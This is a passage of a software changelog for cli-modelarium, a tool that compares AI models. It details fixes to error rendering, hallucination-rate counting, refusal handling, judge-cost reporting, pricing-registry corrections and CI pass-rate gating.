- **The error path crashed on the errors it was written to report, and the exit code it produced was the one that means "an assertion failed".** `_print_error` put its message straight into a Rich `Panel`, which parses markup, so any message containing a bracket raised `MarkupError` instead of printing. Measured through the real CLI: `cli-modelarium pricing 'gpt-[/x]'` printed a traceback and exited **1**; it now prints `Unknown model: gpt-[/x]. Run cli-modelarium list-models to see options.` and exits **2**. Same for `--models 'vendor/model[/]'`. One function, 28 call sites.
|
|
392
|
+
|
|
393
|
+
**The exit code moving 1 to 2 is a behaviour change, and worth reading twice if you gate on it.** The `MarkupError` was escaping to the top-level handler, which prints a redacted traceback and exits 1 - and `EXIT_ASSERTION_FAILED` is also 1, so a bracket in a model id reported the same code as a failed assertion. It now reaches the `sys.exit(EXIT_CALL_FAILED)` that follows 27 of the 28 call sites.
|
|
394
|
+
|
|
395
|
+
**Redaction runs first and escaping last.** `redact_secrets` substitutes key-shaped text, so it can *synthesise* a Rich tag: its `\S+` swallows an intervening bracket and what remains parses as one. Escaping first therefore walks past a tag that does not exist yet - measured on `[x-goog-api-key: AQ.Ab...abcd[not a tag]`, which redacted into a tag-shaped string and **rendered as an empty panel**. Redacting first cannot go wrong because nothing runs after the escape. Escaping weakens redaction in neither order (56,000 fuzz cases across all fourteen rules, zero survivals), and redaction is idempotent, so the three callers that redact before calling here are unaffected. A test pins the order by rendering the wrong one.
|
|
396
|
+
|
|
397
|
+
**A constraint this lifts, and a crash it does not fix.** The comment at the refusal gate said *"KEEP THIS MESSAGE LITERAL. `_print_error` redacts but does not escape"* - true when it was written, false now, and left in place it would have told the next author to keep obeying it; it now records why that message stays literal for a different reason. Separately, `batch --models <typo>` was an unhandled-exception bug rather than a rendering one: `build_batch_states` was called outside any try/except, so `UnknownModelError` escaped uncaught with no markup involved. The entry above fixes it - the call is wrapped and exits 2; `compare` and `pricing` are fixed here.
|
|
398
|
+
|
|
399
|
+
- **The console hallucination rate and the McNemar test it sits above were counting different runs, so the rate a reader saw was diluted.** `compute_mcnemar_pairwise` drops three kinds of run before it builds its table - errored or declined, unjudged, and **unclassified**, meaning a judge answered but named no risk level. The console cell dropped the first two and counted the third. On one run of two models the table printed `1/3 (33%)` for a model that hallucinated on **the only run anyone managed to classify**, three lines above a McNemar line reading `1 paired` on the same data. It now reads `1/1 (100%)`, and a cell where nothing could be classified renders a dash rather than a confident `0/3 (0%)`.
|
|
400
|
+
|
|
401
|
+
**The unclassified state is ordinary, not an edge case.** `parse_hallucination_response` leaves `risk_level` at `None` whenever the judge names a level outside `Low`/`Medium`/`High` - "Critical" and "Severe" are the obvious ones - or returns a value that is not a string, or answers in prose with no score to derive from. What does *not* produce it is simply omitting `risk_level`: the parser then derives one from the score (1-3 High, 4-6 Medium, 7-10 Low), so a scored verdict is always classified. That distinction is now pinned by a test, because the case that looks unclassified and is not was what made this hard to see.
|
|
402
|
+
|
|
403
|
+
**The statistic does not move.** This changes a console denominator to match a test that already existed; `compute_mcnemar_pairwise` is untouched, and the McNemar line on the run above is byte-identical before and after. A seeded 2x2x5 judged run - twenty rows, four cells, a significance test and a McNemar test, `--bootstrap-seed` pinned so the intervals compare too - is identical in JSON, in CSV and in Markdown. **Anyone who read a hallucination rate from an earlier release read one whose denominator may have included runs that were never classified**; the numerator was always right, so a published rate was too low, never too high.
|
|
404
|
+
|
|
405
|
+
- **A declined request was still being sent to a second provider.** `run_judging` guarded on `state.error` alone, and a decline is a third terminal status beside complete and error - so a declined row fell through and was judged like an answer. `score_with_judge` forwards **the original prompt** as well as the response, so every request the first provider had already decided not to process was forwarded to the judge provider anyway. Measured end to end: with a three-run cell declining once, the prompt text appears in the judge's input for all three runs before this change and for two after it. The guard is now `state.error or state.refused`.
|
|
406
|
+
|
|
407
|
+
**The judge was scoring an empty string, and the score was published.** With nothing to evaluate it returned a verdict anyway: on a declined row the CSV carried `judge_score_avg=7`, `judge_count=1` and **`hallucination_risk=Low`** - a model that declined recorded as low hallucination risk - and JSON listed a judge in `judge_degraded`. Three CSV values change on the declined row and only there: `judge_score_avg` and `hallucination_risk` empty, `judge_count` `1` to `0`. `judge_score_std` is a fourth under a panel, where a real number becomes empty; with a single judge it was already empty. Rows the model actually answered are byte-identical.
|
|
408
|
+
|
|
409
|
+
**In JSON the declined row loses `hallucination_risk` outright.** That key is written only `if aggregated_risk_level is not None`, so it disappears rather than turning null, while `judge_score_avg` goes `7` to `null` because its key is unconditional. `judge_cost_usd` drops `0.0033` to `0.0022` and `total_cost_usd_with_judges` `0.005475` to `0.004375` - one judge call per declined row, no longer billed.
|
|
410
|
+
|
|
411
|
+
**An empty `JudgeResult()` does not serialise like `None`, and that is deliberate.** The whole judge block is written `if r.judge_result is not None`, so a declined row keeps `judges: []`, `judge_score_avg: null`, `judge_score_std: null`, `judge_skipped: []` and `judge_degraded: []`, where a `None` would have omitted all five keys. A consumer reading `judges` still finds the list it expects; it is now empty rather than holding a score for an answer that was never given.
|
|
412
|
+
|
|
413
|
+
**Two entry points reach this and the third never had the defect.** `cli.py` routes judging to `run_judging` at `--runs 1` or under `--check-hallucination`, and to `_run_mode_only_judging` otherwise - and mode-only judging has always refused to pick a declined run as a cell's representative, with the reason written at the site: judging it "would spend a real judge call to score nothing and get back 'empty response'". This change brings `run_judging` in line with what its sibling already did, so a plain `compare --judge` and a `--check-hallucination` run now agree.
|
|
414
|
+
|
|
415
|
+
**The blast radius is one provider - and within it, one stop reason.** `refused=` is set in exactly one provider module, so no other provider can produce a state this guard newly drops; a test pins that count so the day a second provider reports declines, the widening is visible rather than silent. What that module detects is narrow: `refused = stop_reason == "refusal"`, the hard API-level safety stop. An ordinary conversational decline ends `end_turn` (Google's ends `STOP`) and is never flagged, on any provider - so a politely declined request is recorded as a successful, billed run, counted in OK and included in the latency, cost and diversity statistics. Measured live: asked a question each would decline, `claude-haiku-4-5` returned `stop_reason=end_turn` and `gemini-3.5-flash` `finish_reason=STOP`, both `refused=False`, and a model that declined both runs showed `2/0/0` in the OK/R/F column. The refusal apparatus above - `refused_results`, the gate's refusal branch, the exclusion from statistics - is reachable only by content that trips that hard stop; it works for what it detects, which is less than an ordinary decline.
|
|
416
|
+
|
|
417
|
+
- **The console hallucination rate counted declined runs in its denominator, so a model that refused looked less prone to hallucinate than one that answered.** The cell divides "runs whose aggregated risk level is High" by "runs that were judged", and a declined run was landing in the second: it has no answer to classify, but the judge ran on it anyway and returned a verdict, so `not jr.judges` did not drop it. Measured on a three-run cell where the model declined once and answered twice, both answers rated Low: the cell rendered `0/3 (0%)` where the evidence supports `0/2 (0%)`. With one of the two answers rated High it rendered `1/3 (33%)` for a model that hallucinated on **half** of what it actually answered, now `1/2 (50%)`. A cell that declined every run rendered a confident `0/3 (0%)` and now renders a dash. **The row already contradicted itself on screen**: its `OK/R/F` column read `2/1/0` - two answered, one declined - two columns left of a rate whose denominator was 3. The guard is now the two-part one `compute_mcnemar_pairwise` has always used - `if s.error is not None or s.refused` - so the table and the test printed below it count the same population instead of two different ones.
|
|
418
|
+
|
|
419
|
+
**Half the new guard is dead on arrival, deliberately.** `run_judging` returns an empty `JudgeResult()` for a state with `error` set, so `not jr.judges` already excluded errored runs and the `s.error` clause changes nothing today; the `s.refused` clause is the whole of the behaviour change, and it in turn becomes redundant once judging stops being called on declined rows. Both clauses are written out anyway so the rule is legible where it is applied rather than depending on a fact about another module - the arrangement that let the two guards drift apart in the first place.
|
|
420
|
+
|
|
421
|
+
**Nothing published moves: this is console-only.** There is no JSON field, no CSV column and no Markdown column for the hallucination rate, so no saved report, no exit code and no statistic changes - only the rendered cell. Nothing pinned it either: no test in the suite asserted a hallucination rate string, which is why the divergence survived. The division was never at risk - `if judged > 0` guards it, and it is the only judge-derived division in the codebase.
|
|
422
|
+
|
|
423
|
+
**The other divergence is closed by the entry above.** `compute_mcnemar_pairwise` also drops a run whose `aggregated_risk_level` is `None` - a judge that answered but named no risk level - and the console cell counted it until that change: a cell of one High and two such runs rendered `1/3 (33%)` where the statistic used `1/1`. Both now drop the same three kinds of run, and tests assert it so a later change has to be deliberate.
|
|
424
|
+
|
|
425
|
+
- **A prompt containing Markdown was reformatted by the report quoting it.** `_md_escape` escaped `\`, `|` and newline and nothing else, so a backtick opened a code span, `*` and `_` became emphasis, `[text](url)` became a live link, and `<img src=...>` passed through as raw HTML into a file someone circulates. A reader could not tell the prompt from the report's own markup, and the prompt is the one thing a comparison report has to reproduce exactly. The inline-formatting characters are now escaped, plus a leading block marker, and the rendered text reads back as exactly what was sent. Ordinary prompts are unchanged.
|
|
426
|
+
|
|
427
|
+
- **The privacy note in all nine READMEs now names the system prompt.** It listed the prompt, the model response and provider error messages as embedded in every output format, and omitted the system prompt - which JSON, CSV and Markdown have always carried alongside them. Nothing about what is written changed; the note was incomplete.
|
|
428
|
+
|
|
429
|
+
- **Refusals are now visible in the multi-run tables and the Markdown report.** A declined request keeps `error` unset so its cost stays in every total, and four surfaces counted outcomes as a succeeded/failed pair - so a model that declined every run rendered `0/0` beside a genuine failure's `0/3`, with a real cost and no label, on the only row whose numbers did not add up to the run count in the table's own title. The per-cell column now shows three numbers under `OK/R/F` on the console and `OK/Ref/Fail` in Markdown (the long form truncates at 100 columns, so the console uses the compact one); the Markdown report header names declines beside failures; and the JSON payload gains `refused_results`. (Emitted only when non-zero at the time; unconditional as of the shape change above.) A cell that produced nothing now says so instead of claiming its outputs were all unique. **No statistic changed** - the count was already computed and already in the JSON per cell, it simply never reached a reader.
|
|
430
|
+
|
|
431
|
+
- **A significance verdict computed partly from declines now says so**, on the console and in the Markdown report, naming the model and how many runs it declined. A decline is a real, billed round trip and stays in the latency and cost samples by design, so a partly-declined arm mixes declines with answers: measured, that can create a verdict (a model that answered once ranked significantly faster than one that answered five times) and can equally erase one (a real difference at p=0.0000 fell to p=0.0710 on two slow declines out of five). The caveat therefore fires on any decline rather than on a fraction or only on a significant result - the erasing case is the one a reader is least likely to catch, because a null result invites no scrutiny. `n_refused_a` and `n_refused_b` are added to the significance JSON block, emitted only when an arm declined.
|
|
432
|
+
|
|
433
|
+
- **A pricing sweep on 2026-09-06 found four rates wrong, two models withdrawn, and four published cached rates missing.** Ten providers were read against their own pricing pages and 81 rows compared, several exercised by live call the same day. `PRICING_AS_OF` had said 2026-07-29 - thirty-nine days earlier - and a stale rate is invisible: the tool prints a confident number and nothing in the output can tell. Three NVIDIA rows died eleven days after their own verification date and nothing surfaced it until a catalogue diff. The two withdrawn models are under Removed above, the two new rows under Added, and the documentation that moved with all of it under Changed.
|
|
434
|
+
|
|
435
|
+
**`gpt-5.6-sol` was the only stored rate found too high this cycle** - the Mistral over-report below comes from four rates that were missing rather than wrong. Registry 5.00 / 30.00 / 0.50 against an official 4.00 / 20.00 / 0.40. Nothing in the row looked wrong because the stale figures were internally consistent - 0.50 is 10% of 5.00 exactly as 0.40 is 10% of 4.00 - so the cached rate corroborated a baseline that is no longer charged. For a tool whose purpose is ranking, the direction is the damage: at 4.00 / 20.00 this model sits **below** `claude-opus-4-8` at 5.00 / 25.00, and the registry ranked it above. It is a PROMOTIONAL rate, "available at least through November 21, 2026", so this row goes back UP around then - the same dated-comment shape the three `gemini-*-flash` rows carry for their 2027-01-01 doubling, in the opposite direction.
|
|
436
|
+
|
|
437
|
+
**Both DeepSeek rows were roughly 3x low on input and 4.5x low on output, and matched neither of DeepSeek's two tiers.** Peak is 1.32 / 3.96 and 0.44 / 1.32; off-peak is exactly half of each; the stored 0.435 / 0.87 and 0.14 / 0.28 were neither, and read like rates from a pricing structure DeepSeek has since revised. Cached was worse - 0.003625 against a published 0.044, and 0.0028 against 0.014. The comment that stood there said "standard-hours (not off-peak)", which was wrong twice over: standard hours **are** peak, and the figures were not peak either. **PEAK is now stored**, the conservative direction, so the tool over-reports an off-peak run rather than under-reporting a peak one - the same reading the NVIDIA zeros take. **The schema still cannot express what DeepSeek does**: peak is 01:00-04:00 and 06:00-10:00 UTC Monday to Friday, so a `--runs 5` comparison started at 03:55 UTC crosses a price change mid-run and every cell is priced at the one stored rate. That is recorded at the block rather than fixed.
|
|
438
|
+
|
|
439
|
+
**`qwen3.7-plus` is on a 20% discount and the number alone could not say so.** Alibaba's Singapore table reads "List price $0.4 (Limited-time 20% off)" on input and the same on output. The stored 0.40 / 1.60 is the list price and is kept: it is what this file's own block rule already specifies for Qwen flagships, it over-reports rather than under-reports when a promotion ends without notice, and the table does not say whether the cached rate is discounted too - so an "effective" row would be part measured and part guessed. **No figure changed here; the comment did.**
|
|
440
|
+
|
|
441
|
+
**Four Mistral cached rates were published all along and the registry carried none**, so cached tokens fell through `calculate_cost`'s full-input-rate fallback and **over-reported every Mistral cache hit tenfold**. All four are exactly 10% of input: 0.15, 0.05, 0.015, 0.03. The fallback was the right default while the rates were unknown and is still right for Groq, OpenRouter and Moonshot; the comment that cited Mistral as a fellow example is corrected, or the file would explain a decision it no longer makes.
|
|
442
|
+
|
|
443
|
+
**`PRICING_AS_OF` is 2026-09-06 and now says what the date means**, and the per-row dates that a newer check superseded are gone - the OpenAI, Anthropic, Google, xAI, DeepSeek, Mistral, DashScope and Z.AI block dates. A dated comment is left only where it still carries information: the Gemini 2.5 deprecation checks (a different fact, not a price), the NVIDIA reachability call, and Moonshot's documentation read.
|
|
444
|
+
|
|
445
|
+
**Four providers are recorded as NOT covered by that date**, rather than swept under it. `groq`: rates match every third-party source, but two sources report that on 2026-08-26 `llama-3.1-8b-instant` and `llama-3.3-70b-versatile` moved from self-serve to sales-led enterprise - a pricing page cannot answer that and no catalogue call was made. `moonshot`: corroborated only through Alibaba's resale listing, which is corroboration through a reseller rather than first-party verification. `nvidia`: unverifiable by construction, and 3 of its 9 rows are dead (410 Gone, EOL 2026-08-26). `openrouter`: not checked at all - and it is the one provider that serves prices through its API, so that block should be verified by a script rather than by hand.
|
|
446
|
+
|
|
447
|
+
**`o3-pro` is flagged, not changed.** On an unverified key it returns "Your organization must be verified to use the model o3-pro". It is listed, priced and current - gated, not retired - a third state beside "present" and "retired" that this schema has no field for, and because the row is in `--models all` that command fails outright for anyone unverified. Deleting a live model because one key cannot reach it would make it an "Unknown model" for every organization that can.
|
|
448
|
+
|
|
449
|
+
- **`_format_json`'s "byte-identical to v0.1.0 at `runs == 1`" claim is corrected, and it was already false before these fields.** 0.2.0 made `total_runs` and `methodology` unconditional, so a single-run compare payload has carried two post-v0.1.0 keys since that release. The docstring now states the rule that actually survives: no key is ever removed, and a consumer reading by name is unaffected.
|
|
450
|
+
|
|
451
|
+
## [0.1.9] - 2026-09-02
|
|
452
|
+
|
|
453
|
+
### Added
|
|
454
|
+
|
|
455
|
+
- **Claude Fable 5.1 joins the registry** as `claude-fable-5-1`, at $10.00 input / $50.00 output per 1M tokens with a $0.25 cache-read rate, taking the registry from 93 models to 94. It rejects sampling parameters - `temperature`, `top_p` and `top_k` each return a 400 reading "deprecated for this model" - so the tool omits the field and the flagged set goes from sixteen to seventeen. Used as a judge it therefore joins the degraded-judge set and prints the non-reproducibility notice, exactly as `claude-opus-5` and `claude-sonnet-5` do. Thinking tokens are counted inside `output_tokens`, so the output rate covers them and the reported cost is complete.
|
|
456
|
+
|
|
457
|
+
**The $0.25 cache rate is 2.5% of input, where every other Claude row is 10%, and it is not a typo.** Anthropic's pricing page footnotes cache hits on Fable 5.1 and Mythos 5.1 at 0.025x base input and every other model at 0.1x. It is pinned by a test, because an editor "correcting" it to $1.00 would quadruple every reported cache saving in silence.
|
|
458
|
+
|
|
459
|
+
It is in **no static group**: `all-flagship` / `all-premium` carry one model per provider and `claude-opus-5` holds the Anthropic slot, so promoting Fable would double the input and output price of every `all-flagship` run. It **is** included in `--models all`, on the same basis as every provider except OpenRouter and NVIDIA - its prices are real and it adds no duplicate-weight row. At $10/$50 that is the most expensive row `all` can select, and `--max-cost` is the existing lever if that matters to you.
|
|
460
|
+
|
|
461
|
+
The nine READMEs gain a line in the privacy note: Claude Fable 5.1 requires 30-day retention and is not available under zero-data-retention. It is the only registry row with such a condition, and the line is phrased as a property of that model rather than a contrast - this tool has not verified the retention posture of the other 93.
|
|
462
|
+
|
|
463
|
+
### Changed
|
|
464
|
+
|
|
465
|
+
- **The Anthropic SDK moves to 1.x; `temperature` now travels via `extra_body`.** The pin was `anthropic>=0.104,<0.200`, which cannot install any 1.x release. 1.x removed `temperature`, `top_p` and `top_k` from its typed signatures, so passing one raises `TypeError` before any HTTP call - which broke five of the ten registered Claude models (`claude-haiku-4-5`, `claude-sonnet-4-6`, `claude-sonnet-4-5`, `claude-opus-4-6`, `claude-opus-4-5`); the other five never receive a temperature and were unaffected. The provider now sends it through `extra_body`, which is merged into the request JSON as-is and which those models still honour. The pin floors at 1.3, not 1.0: 1.3.0 is what this provider was exercised against, and 1.0.0-1.2.0 have been run by nobody here. Nothing else in `pyproject.toml` moves - `httpx~=0.28` stays, because `httpx2` is a separate distribution and the two resolve side by side; the full resolve adds `httpx2`, `httpcore2` and `truststore` and removes or downgrades nothing.
|
|
466
|
+
|
|
467
|
+
**Temperature validation is unchanged, in both directions.** The 0..1 range was never enforced client-side - the typed parameter was an annotation, not a constraint, and 0.125.0 sent `temperature=2.0` and even `temperature="hot"` to the server without complaint. `--temperatures 0,0.7,2` failed as a round-trip 400 before this change and still does. No client-side range check was added: doing so would change behaviour this release otherwise leaves alone.
|
|
468
|
+
|
|
469
|
+
- **The CSV layout gained two columns, `stop_reason` and `stop_category`, appended after `assertions_failed_types`.** A pipeline reading CSV by column position will need updating; one reading by header name is unaffected. They are empty for every non-refused row.
|
|
470
|
+
|
|
471
|
+
### Fixed
|
|
472
|
+
|
|
473
|
+
- **Refusals from Claude models are now reported as refused rather than counted as empty successes, with their cost and a new `stop_reason` field.** A declined request arrives on HTTP 200 with real cost and no answer, and the provider only ever read the usage block - so it recorded an ordinary success with an empty output. Four of the ten assertion types pass against an empty string (`not_contains`, `max_length_chars`, `latency_under`, `cost_under`), which meant a CI gate built from cost, latency and a length cap reported a 100% pass rate on a request the model declined and you were billed for. That gate now exits 1: a refused cell marks every configured assertion as errored, which leaves `pass_rate` undefined and routes to the existing "nothing was verified" path rather than needing a new exit code. **CORRECTION (see 0.2.0): that held only when every model refused.** `pass_rate` is undefined only when NO assertion anywhere in the batch produced a verdict, so on a multi-model run - the shape this project's own workflow publishes - one model that answered kept the rate defined at 1.0 and the gate exited 0. The refusal is now gated on directly rather than through the empty denominator. Detection is by `stop_reason`, never by an empty content array - `claude-opus-5` refuses with a thinking block and non-zero output tokens while `claude-fable-5` refuses with nothing, so an emptiness check would miss the first. `refused` is carried beside `error`, never folded into it: `error` still means the call failed and cost nothing, so a refusal keeps its cost in every total and does not turn a 200 into a call failure. Output-derived statistics now exclude refusals; timing and cost do not. That matters most under `--runs`, where five refusals used to give one unique output, `output_diversity` 0.2 and a stable mode of `""` - low diversity and a steady mode read as a highly deterministic model, when it had refused five times. `stop_category` is stored and rendered as an opaque string and never branched on, because the provider's category set is open.
|
|
474
|
+
|
|
475
|
+
- **Provider request parameters are now checked against the real SDK signature.** Every provider's test double accepts `**kwargs`, so a keyword the real typed method rejects passes in tests and raises `TypeError` on every live call. A new suite drives each provider's real code path through a recorder and asserts the kwargs it built are a subset of the parameters the installed SDK declares, for all four SDK families; Google's nested `config=` keys are checked the same way. It needs no network and no API key.
|
|
476
|
+
|
|
477
|
+
## [0.1.8] - 2026-08-31
|
|
478
|
+
|
|
479
|
+
### Added
|
|
480
|
+
|
|
481
|
+
- **Moonshot AI (Kimi) as a twelfth cloud provider, with four models. It is registered from Moonshot's published documentation and has NOT been exercised against the live API** - Moonshot requires a $1 minimum top-up before any request and no key was purchased, so every figure below was read rather than measured. That is a weaker basis than every other provider here carries, and it is stated first because a cost figure you cannot check is worth less than one you can. `MoonshotProvider` is a thin `OpenAIProvider` subclass at `https://api.moonshot.ai/v1`, in the shape of `DeepSeekProvider` and `ZAIProvider`; streaming, TTFT, `stream_options` usage, error translation, redaction and retry are all inherited unchanged. Set `MOONSHOT_API_KEY` or run `cli-modelarium keys set moonshot`.
|
|
482
|
+
|
|
483
|
+
Four models, per 1M tokens as input / output: `kimi-k3` 3.00 / 15.00 at 1,048,576 context; `kimi-k2.7-code` 0.95 / 4.00; `kimi-k2.7-code-highspeed` 1.90 / 8.00; `kimi-k2.6` 0.95 / 4.00, the last three at 262,144. The highspeed row is exactly double its base on both columns - that is Moonshot's published relationship, the same model on a faster serving route, not a copied row - and `kimi-k2.6` shares `kimi-k2.7-code`'s input and output while differing only in a cache rate that is not registered. Both are pinned by tests, because each reads as a typo otherwise. `kimi-k2.5`, the `moonshot-v1` family and the `kimi-k2` previews are NOT registered: the first two sunset today and the third was discontinued 2026-05-25. Nothing was added to `RETIRED_MODELS` - that structure is for ids this registry once served, and none of these ever were, so `Unknown model: kimi-k2.5` is already accurate.
|
|
484
|
+
|
|
485
|
+
**No cached-input rate is registered for any of the four, and Moonshot does publish one.** Its chat API documents `usage` as four flat fields - `prompt_tokens`, `completion_tokens`, `total_tokens`, `cached_tokens` - with no `prompt_tokens_details`, and `OpenAIProvider.complete()` reads `cached_tokens` only from inside `prompt_tokens_details`. Against the documented shape a registered rate could never fire, so it would be four dead constants. **The consequence: cached tokens bill at the full input rate, so a Kimi cost is over-reported against a real cache hit** - the safe direction, and identical to how the Mistral, Groq and OpenRouter rows already behave. 32 of the 89 pre-existing entries were already in this state. `tests/test_moonshot_provider.py` pins what the client extracts from each candidate shape, so if a live call ever shows the nested one the rates can be added and the test says they will then fire.
|
|
486
|
+
|
|
487
|
+
**One thing no amount of reading can settle: whether `completion_tokens` includes reasoning tokens.** The documented usage block shows no separate field and thinking is always on for these models, which points to inclusion. If it does not, every Kimi cost is understated by whatever fraction of generation was reasoning - the defect this project already hit on Gemini, where thought tokens outnumbered visible output about 19 to 1 on a short prompt. Recorded in `moonshot_provider.py` so the next person does not re-derive it.
|
|
488
|
+
|
|
489
|
+
All four fix `temperature` (and `top_p`, `n`, `presence_penalty`, `frequency_penalty`), so the tool omits the field and the flagged set goes from twelve to sixteen. **Those four flags came from the parameter reference, not from a measured 400**, which is a different standard from the other twelve; `tests/test_temperature_predicate.py` now records that distinction rather than silently absorbing it. A Kimi model used as a judge therefore joins the degraded-judge set and prints the non-reproducibility notice.
|
|
490
|
+
|
|
491
|
+
**The 429 quota subtype is not yet distinguished.** `exceeded_current_quota_error` means an empty balance and should not retry, but Moonshot's documented error body is nested, so the SDK leaves `err.type` as `None` and the subtype is reachable only through `e.body` or a substring of the message - which would mean changing `_reraise`, shared by nine of the twelve providers, to match a shape nobody has observed at runtime. Deferred. The cost is bounded and small: an empty balance costs four attempts and about seven seconds per cell before a clear error naming the quota.
|
|
492
|
+
|
|
493
|
+
Moonshot is included in `--models all`, on the same basis every provider except OpenRouter and NVIDIA is: its prices are real, it adds no duplicate-weight rows, and its models are rate-limited rather than unreachable. **One second-order effect worth knowing**: the live per-model streaming display auto-collapses above twelve concurrent tasks, and ten one- and two-provider key combinations currently sit at nine to twelve. Adding a Moonshot key pushes those over, so those users see the one-line "many concurrent tasks" notice instead of the panels. Cosmetic, and `--show-all-runs` forces the panels back.
|
|
494
|
+
|
|
495
|
+
Moonshot requires a $1 minimum top-up before any use - there is no free tier, unlike every other provider here - and Tier0 is 1 concurrent request, 3 requests per minute and 1.5M tokens per day, with $10 cumulative top-up moving you to Tier1. The concurrency default is unchanged at 5: it is one value applied to every provider, and a fixed default cannot be right for both Tier0's 1 and Tier1's 50. The nine READMEs document the tier beside the existing DashScope note, and the bullet claiming per-provider limits "respect all tier baselines" - false the moment this provider landed - is corrected in all nine.
|
|
496
|
+
|
|
497
|
+
- **A sentence in the nine READMEs' privacy note saying that data retention and training terms differ between providers, that this tool makes no claim about any of them, and that you should check the terms of each provider you configure.** It names no provider deliberately: naming one would imply the other eleven do not train on customer content, which this project has never claimed and has not verified across eleven independently-changing sets of terms. `SECURITY.md` already carries a provider-agnostic version; this puts it where users actually read, and in the eight translations.
|
|
498
|
+
|
|
499
|
+
### Changed
|
|
500
|
+
|
|
501
|
+
- **Your reported judge cost will drop, by up to 95% on a `--runs 20` comparison. No spend changed and no data was lost - the old figure counted one judge call N times.** With `--runs N` and no `--check-hallucination`, judging makes ONE call per `(model, temperature, system_prompt)` cell and gives that single verdict to every run in the cell. It gave them the same object, and five separate places sum `judges[].cost_usd` over every row: the two console summaries, the JSON formatter, the markdown formatter, and `total_judge_cost`. None of them could see that twenty rows shared one call, so all five multiplied it by twenty. The call count did the same thing - `40 judge calls` for the 2 that were made. A comparison that reported `$0.004000 (40 judge calls)` yesterday reports `$0.000200 (2 judge calls)` today, and the second figure is the one that matches the bill. Per-run judging - `--check-hallucination`, or `--runs 1` - was never affected: every run there has its own verdict, and its cost and call count are unchanged.
|
|
502
|
+
|
|
503
|
+
**Fixed at the expansion, not at the five sites.** The first run of each cell keeps the verdict that was paid for and the rest get zero-cost copies, so every site agrees without any of them changing, and each row still shows the score and reasoning it inherited. The call count skips the copies via a marker set where the copy is made; it is **not** derived from a non-zero cost, because 17 registry rows are legitimately free and a free judge's calls must still count.
|
|
504
|
+
|
|
505
|
+
**This does not change what you are charged, and it does not change `--max-cost` or a `cost_under` assertion** - neither reads the judge total. What changes is the number reported to you afterwards, on every surface that reports it.
|
|
506
|
+
|
|
507
|
+
- **`--runs N` with `--judge` compared the right number of observations, for the wrong reason, and was one commit away from stopping.** The score sample the significance test consumes was keyed on object identity, and came out at one observation per cell only because every run in a cell pointed at the same verdict object. De-aliasing those objects - which the cost fix above requires - would have silently turned `n=3` into `n=15`: fifteen "independent" observations of three judgements, and a p-value that fell by nine orders of magnitude with no warning. The verdicts now record explicitly that they are shared across a cell, and the sample is one observation per judged unit either way. Landed before the cost fix, and the samples are byte-identical across it.
|
|
508
|
+
|
|
509
|
+
- **Paired significance tests over more than one temperature or system prompt used a third of the data.** `--significance-test paired-t` and `wilcoxon-signed` matched observations on `run_index` alone. Run 0 exists in every cell, so three temperatures collided into one entry and the later cells overwrote the earlier ones: a 3-temperature x 5-run comparison paired 5 observations and reported `n=5`, or `insufficient_samples` where it had enough data for a verdict. Observations are now keyed on the whole cell plus the run.
|
|
510
|
+
|
|
511
|
+
- **A model that produced nothing was reported at `avg 0.000`.** 0.0 is a real mean a model can score, so it could not also mean "no data" - and it appeared on the one line whose job is to compare two models, rendering a total failure as the worst possible result rather than as an absent one. `mean_a` and `mean_b` are now `null` on an empty sample; the console prints `no data` and the markdown table a dash. The arithmetic is untouched: an empty sample already routed to `insufficient_samples` with `p=null`.
|
|
512
|
+
|
|
513
|
+
- **Four displays reported less than the run had measured.** The degraded-judge notice - the judge rejected a temperature setting, so its scores are not reproducible - existed only in the single-run display, and not under `--runs N`, the flag reached for to measure reproducibility. A judge can classify hallucination risk and return no parsable score; `hallucination_risk` in the JSON needs only the classification, so the JSON said `High` where the console and the markdown table both said `N/A`. The temperature caveat that qualifies a significance verdict reached the console and the JSON but not the markdown, which is the format written to a file and passed on. And a panel average rendered `7.0 (1)` when one judge of three parsed, which is exactly how a single-judge panel renders; it now reads `7.0 (1 of 3)` on the console, with the CSV column unchanged.
|
|
514
|
+
|
|
515
|
+
### Fixed
|
|
516
|
+
|
|
517
|
+
- **A CI gate could pass on a batch where nothing was evaluated.** Errored assertions are excluded from both the numerator and the denominator of the pass rate - deliberately, so a missing optional dependency does not turn a build red. When they were the ONLY thing that happened the denominator was empty, and `total_passed / total_definitive if total_definitive else 1.0` substituted the ideal value: `0/0 (100.0% pass rate)`, exit 0, **even under `--min-pass-rate 1.0` and `--strict-assertions`**. `pass_rate` is the field a gate reads, and the sentinel pointed at pass. **CORRECTION (see 0.2.0): that closed the empty-denominator door and a second one stayed open.** A refusal removed only ITS OWN assertions from the denominator, so with another model answering the rate was a genuine 1.0 over what remained - no sentinel involved, and the same escape past `--min-pass-rate 1.0` and `--strict-assertions`. If you read this entry as closing the class, it did not.
|
|
518
|
+
|
|
519
|
+
**`pass_rate` is now `null` rather than `1.0` on that path**, in JSON and in the rendered summaries. Omitting the key was rejected: `payload.get("pass_rate", 1.0)` would have reproduced the exact bug inside the consumer, and absence would be indistinguishable from a version that never emitted it - the reasoning already recorded in `_format_json`'s own docstring for `models_without_temperature` - the EXCEPTIONS paragraph, which argues that a consumer must be able to read a key directly rather than treat its absence as a value. (Quoted rather than cited by line: the line range this originally named has since drifted onto a section banner.) Keeping `1.0` beside a new boolean was rejected for the same reason: anyone not reading the flag still reads `1.0`. `null` raises at the one moment the value is meaningless.
|
|
520
|
+
|
|
521
|
+
**Two different situations reach the empty denominator and they are now told apart**, because the remedy differs. A suite whose assertions all errored is broken and exits 1 whether or not a gate flag was passed. A suite with no assertions at all is not broken; it exits 0 as before, and exits 1 only when `--min-pass-rate` or `--strict-assertions` explicitly asked for a gate that cannot be satisfied. Both print what happened. `AssertionTotals.configured` is the discriminator; guarding on the empty denominator alone would have given a suite with no assertions the broken-suite treatment.
|
|
522
|
+
|
|
523
|
+
**The optional-dependency guarantee is unchanged in the case it was written for.** A `json_schema` assertion that cannot run alongside assertions that can still contributes nothing to the verdict and still exits 0. Only the degenerate run - where nothing at all produced a verdict - changes, and `tests/test_cli_assertions.py` now pins both halves.
|
|
524
|
+
|
|
525
|
+
`total_assertions_errored` is added to the JSON, always present whenever the assertion block fires and `0` on the normal path, for the same reason `pass_rate` is `null` rather than absent. The console summary guard at `cli.py:1192` was `definitive > 0 or failed > 0`, false on exactly this path, so the one line a reader scans said nothing about assertions on the run where it mattered most; it now reports the errored count. Nothing else moves: no statistic, p-value, confidence interval or cost figure is touched.
|
|
526
|
+
|
|
527
|
+
- **Three ways a `batch` gate passed with zero assertions evaluated.**
|
|
528
|
+
|
|
529
|
+
